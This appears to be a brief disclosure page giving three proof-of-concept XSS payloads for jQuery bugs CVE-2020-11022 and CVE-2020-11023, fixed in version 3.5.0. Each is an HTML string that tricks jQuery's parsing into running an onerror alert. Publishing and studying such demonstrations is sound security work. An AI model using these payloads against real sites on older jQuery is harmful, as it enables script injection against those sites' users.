jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)
PoCs of XSS bugs fixed in jQuery 3.5.0. You can find the details in my blog post: English / 日本語
PoC 1
<![CDATA[
<style><style /><img src=x onerror=alert(1)>
]]>
PoC 2 (Only jQuery 3.x affected)
<![CDATA[
<img alt="<x" title="/><img src=x onerror=alert(1)>">
]]>
PoC 3
<![CDATA[
<option><style></option></select><img src=x onerror=alert(1)></style>
]]>